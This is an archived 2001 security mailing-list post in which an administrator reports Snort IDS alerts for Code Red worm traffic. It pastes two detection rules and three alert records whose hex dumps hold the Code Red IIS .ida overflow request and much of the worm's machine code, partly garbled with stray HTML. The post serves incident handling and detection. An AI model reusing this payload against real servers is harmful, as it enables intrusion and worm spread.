Code Red hits from inside network?

From: Nuno Fernandes (nfernandes@real-secure.com)
Date: Wed Aug 01 2001 - 18:33:52 PDT
Next message: Owen Creger: "Code Red v2 ?"
Previous message: Alfred Huger: "Code Red Thread is Dead, more or less."
In reply to: Dave Salovesh: "RE: Code Red hits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,

    Our snort IDS has been picking up odd traffic from our global IP address
of the firewall. 199.105.208.201 is our NAT IP and snort is picking up
systems from our inside network sending code red worm traffic out. The real
strange this is that we checked the systems and they are Windows NT
workstations with no IIS on them. I'm sure the rules are right since all I
did was change the msg and the port to EXTERNAL. I pasted what we got and
wondering if anyone else seen this. Also here are my rules.

alert TCP $INTERNAL any <> $EXTERNAL 80 (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".idq?"; classtype:
system-or-info-attempt; reference: arachnids,552;)

alert TCP $INTERNAL <> $EXTERNAL 80  (msg: "IDS552 IIS ISAPI Overflow ida
Outbound"; dsize: >239; flags: A+; uricontent: ".ida?"; classtype:
system-or-info-attempt; reference: arachnids,552;)


----------------------------------------------------------------------------
--
#(2 - 60843) [2001-08-01 13:25:23] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 207.251.72.172 -> 199.105.208.201
      hlen=5 TOS=16 dlen=332 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 46247  flags=***AP*** seq=1013502254
      ack=831497185 off=5 res=0 win=7988 urp=0 chksum=0
Payload:  length = 292

000 : 53 C2 BC 00 2F 64 65 66 61 75 6C 74 2E 69 64 61   S.../default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   N.090.858.bd3.80
100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
120 : 31 00 30 39                                       1.09
----------------------------------------------------------------------------
--
#(2 - 60997) [2001-08-01 14:46:32] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
      hlen=5 TOS=16 dlen=1547 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 57948  flags=***AP*** seq=583521197
      ack=3604700076 off=5 res=0 win=8280 urp=0 chksum=0
Payload:  length = 1507

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q&lt;..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B&lt;..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....&lt;.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
560 : 08 8B 51 10 5F 6F 77 6E 65 72 73 22 20 74 61 72   ..Q._owners&quot;
tar
570 : 67 65 74 3D 22 5F 74 6F 70 22 20 63 6F 6F 72 64   get=&quot;_top&quot;
coord
580 : 73 3D 22 30 2C 30 2C 20 39 36 2C 31 30 22 20 6F   s=&quot;0,0,
96,10&quot; o
590 : 6E 4D 6F 75 73 65 4F 76 65 72 3D 22 6C 69 28 27
nMouseOver=&quot;li('
5a0 : 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F 6E 2E 67   r', '/arrow_on.g
5b0 : 69 66 27 29 3B 72 65 74 75 72 6E 20 74 72 75 65   if');return true
5c0 : 3B 22 20 6F 6E 4D 6F 75 73 65 4F 75 74 3D 22 6C   ;&quot;
onMouseOut=&quot;l
5d0 : 69 28 27 72 27 2C 20 27 2F 61 72 72 6F 77 5F 6F   i('r', '/arrow_o
5e0 : 66 66 2E                                          ff.
----------------------------------------------------------------------------
--
#(2 - 60996) [2001-08-01 14:46:32] [arachNIDS/552]  IDS552 IIS ISAPI
Overflow ida Outbound
IPv4: 209.67.183.22 -> 199.105.208.201
      hlen=5 TOS=16 dlen=1420 ID=0 flags=0 offset=0 TTL=240 chksum=0
TCP:  port=80 -> dport: 57948  flags=***AP*** seq=583521197
      ack=3604698569 off=5 res=0 win=8280 urp=0 chksum=0
Payload:  length = 1380

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q&lt;..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B&lt;..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....&lt;.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
560 : 08 8B 51 10                                       ..Q.



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Owen Creger: "Code Red v2 ?"
Previous message: Alfred Huger: "Code Red Thread is Dead, more or less."
In reply to: Dave Salovesh: "RE: Code Red hits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 21:01:55 PDT